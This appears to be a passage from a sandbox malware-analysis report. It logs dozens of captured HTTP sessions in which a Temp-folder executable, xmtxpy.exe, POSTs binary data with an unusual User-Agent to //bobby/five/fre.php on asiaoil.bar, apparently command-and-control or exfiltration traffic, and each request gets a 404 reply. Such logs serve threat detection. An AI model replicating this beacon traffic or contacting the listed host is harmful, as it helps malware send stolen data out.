                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6LETH6p%2BXICZC%2BrIHSRQApAEV%2Bdr0iLIW7rBeA%2Fr7Hi4%2Fpf1OlVs9AUjZdSrzw3XtXmW7vu3g0lnMlRgI0IK52z10KSNGVwmWG%2FAp9wtB9EgWL0CS5tO1Mwb6FiG8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446686e9b6945-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    43192.168.2.2249208172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:48.837397099 CET387OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:48.933581114 CET388INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4V5E6ygM8Zq2gQc6SjFi%2FduljsFbImOHJ2nmf7IuPxW2RhXkT%2B0BhOAD5WjYjJ5QxUVoGAUnhyaY3n4fiulEfle%2F5%2F3JKoNA8quALyniLNaaaxsFzuwruQ92V8j%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4466f4f5c92a2-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    44192.168.2.2249209172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:49.900198936 CET389OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:50.045497894 CET390INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfchENBNL5Aam3jQilD1C%2BA7X%2BWklnynb2xLSVS2hPjR0y3qmNn6hmUtwb8IQB8oZoMl23JHAHV2q0I12pykgsoVoLNPvb6k5VdZyObk9ltGFYeKlP7GBpYhUI6%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44675ef0390ee-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    45192.168.2.2249210172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:51.041532993 CET391OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:51.130028963 CET392INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Tlu5Y7AoBorQeMU0%2B32D%2BTFyCDvUY1OQkVB8rypJEdhrQ%2Fenzeu1n%2FT9n9uSqWWX9J%2BfmRJVbTKpt0De%2B5ne1ly1J723TtCWodVcJOhHfjabsPPmaz0oqCOHEICNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4467d0fb492c5-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    46192.168.2.2249211104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:52.063119888 CET392OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:52.182354927 CET393INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqldRdslDF9crV%2Bk4ngGcH%2B5VotqLHwZM1hgM1UlLzVHOK203cYnXP5jYPCyykRHqAUueXlxKMSBzyNAjlM%2Fvqw8Nwi0ss%2FzYQhSE9EUH9wjaK0hKyn3kcN4463E9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446836b79922b-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    47192.168.2.2249212172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:53.153614998 CET394OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:53.252991915 CET395INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBS7%2BxqKYn8UXFWYtCxhAQUq3wICMu07YMkjyXgzMiD7WnMo34wuo3JBZQt3f%2FvhAz73H9wPdN018HSvgXnDpUBiOvoVzzkvgWsPGM8s4%2F62axP9o7SVvlxiAsFAoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4468a3cbe8fc8-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    48192.168.2.2249213172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:54.210618019 CET396OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:54.306786060 CET397INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0AcT1bifDuMhi7ufsGdy3ZWrMEsl7Ml0%2BBsoYKk1Le07SGb1K3vfiYvudRQACEJNwZd7L%2BjjiNvFHdUhY8ZVQ%2FCWgWD2crnmZAbKNk%2BQ47TcQ8b%2FoLYdTuy2B3gQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44690dd409094-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    49192.168.2.2249214172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:55.222618103 CET398OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:55.306236029 CET399INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2b3lnzs0K50M9KlApGlxtS1%2FGBbpcngBLWZrh0QHIPyWMt9R51HhBbpbNzNiN2fgnCx%2F6Ol9cv3FYjGdC9Z4%2Ff%2B7v%2FeKPnRbogo3FCV4owbNiUoY5%2BcPZ%2FGa%2BNALAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446972bed9091-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.2249170104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:05.958935022 CET319OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:06.048285007 CET320INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FkwECIztonU5sKraKeo0SBfQsbzTNEo9c%2Fgv1LcFjyGRwr%2BO5HxPKVAbUysSrtRDLw4YSAITjFTpY93Ba0oLX8DHultt24WrAHZv82zviiHQIIiLmBXtIoOyR3vI7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44563480c9225-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    50192.168.2.2249215172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:56.235039949 CET400OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:56.328077078 CET400INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lLUedeVgcznC2S%2FUOpbd3fV7v3cGuLCjsT%2FMbiJAVwvVHvZbCBonSZeAGG5JhojOiJyGydHeh3PL5Tp9nmU4EBUX2wVPhLZEEPBr7kenjFn1%2BoSu1sUFZrFUzTyPOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4469d8ada926e-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    51192.168.2.2249216172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:57.354640007 CET401OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:57.520679951 CET402INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pP7Hm%2FZYo7nBNCdlCm%2B6iCgzILR5XUlKf4GwH1GgSKX5qjvCOl3q7%2FhYlNsVlCRNbRgfIjWoULsECCJWVGVm8TwlUOckIQOjjEp9dOME2g%2F3YvZInDvXJ3pNqXehHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446a48a19903d-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    52192.168.2.2249217172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:58.437792063 CET403OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:58.535232067 CET404INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4Hpj5tBS1W25DrOmF70H9%2B7tI00TcoHrZ2vWxTGczWKIQtBUxqfhFCMGDZXE%2FiPTxLHEXRSNrcwpGvMMbC3NGIUBMWmkmFsI9cJLit7sz%2BX56ge756zUtFrYA%2Fn%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446ab4e2a9049-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    53192.168.2.2249218172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:59.543742895 CET405OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:59.660451889 CET406INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2BJFLdnSBYTENDu1tAbRmg3yPPpEafzaD1AIG2OO%2FT%2B%2FQqTuiDGTxzFlf9dnChU0IP%2BEp15Zkavznvg6v0hcTAYsTYetiP8tjAE8TcK4xJqEQeCFqj2PFKCcO8YbOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446b23dcd9241-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    54192.168.2.2249219172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:00.557396889 CET407OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:00.711899996 CET408INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rk9UBUg8rEXXmstTEerwpTwam6ReU4ftvK8vLG6DGGX39NP0Tj8xTjWk5qWPBqpC6tqrpuX%2FZqaa1n1qmYBhnF44n8KZVoyEqklrYO98Ih0UxdfXxgiW0okoqK2%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446b88b306963-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    55192.168.2.2249220172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:01.628313065 CET408OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:01.731878996 CET409INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtSZVRNhVan7fQu%2B%2BS3YF0dvuQRKfPnhQmljq7WJs%2Fj8JMEfpH8AMemLWNbqYw4tgA6v4NG3xTvYc3Z5%2FpGQb5ljWthkbv4uo%2FhbZQYC96NTyl%2B9dg2FM9CZdOcU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446bf3ee59235-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    56192.168.2.2249221172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:02.628099918 CET410OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:02.733601093 CET411INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lp2m%2FnL%2FD9YbbOQL75qiqY1QRie4l95Zh1%2F9JFc7ntQcAGF4IIGoKgD%2F4oPRxszoZK9oVvGOpnhqWzAxSgnH3OqLPGrbcPmuYuhePgMIcrCkD3ZE2%2Bku1MZOs6ktMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446c57aff90af-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    57192.168.2.2249222104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:03.670597076 CET412OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:03.758486986 CET413INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTMZeN6TFXbag2y1OBliS7F8Ve1jWw99EUBWoXAAGITxys1b9P94l43Uq0a%2B%2Fvyd8PfkcQkVRk9vtaYxi3J9PRjAhKWq89oNOgEI8T7X4pa5jNQ6EzOTmt9dPn8AJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446cbfd179273-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    58192.168.2.2249223104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:04.661405087 CET414OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:04.741179943 CET415INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ixohb6DjBvyEHcF0bBjTjwa28InQY%2BYLPlgexuM%2B84%2F6oOs4V7fazNyzJ4xoT6rgqB9hhVA18VkbtDdbf8imwrd%2Bcpfb9TH%2BBpi1dLQ9%2FLh%2BYjGvjuxWzsCeqqBpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446d23961910a-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    59192.168.2.2249224172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:05.954619884 CET416OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:06.040098906 CET416INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EE%2FH1l4X4mMaNy6pFboc6LUO8GAlkZzav%2FOZJIxi5sLykIm1li2uICH5vhNS6WFsxhSSyzMACuulnYIlnwvZpCsgsM7VNvUGg6SyBgvKaTyfwg7BclNEWkPSWBEWjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db446da4ba95c32-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.2249171172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:22:07.006112099 CET321OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:07.110586882 CET322INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mWD8oFcQTyd%2FKCuxdF4a9PY1C39C0%2FGNEfnX%2F9EktX8IXwXAk4CddsJG8chvleqV6%2Bl4Pe9X7pM9zS7OCYa1Qb%2B3%2FB%2BhM5NKwwPD%2BX%2FUskzFky%2FFOD%2Fvt045vN%2BQZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44569da6591e1-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    60192.168.2.2249225172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:23:08.596977949 CET417OUTPOST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:23:08.680362940 CET418INHTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:23:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
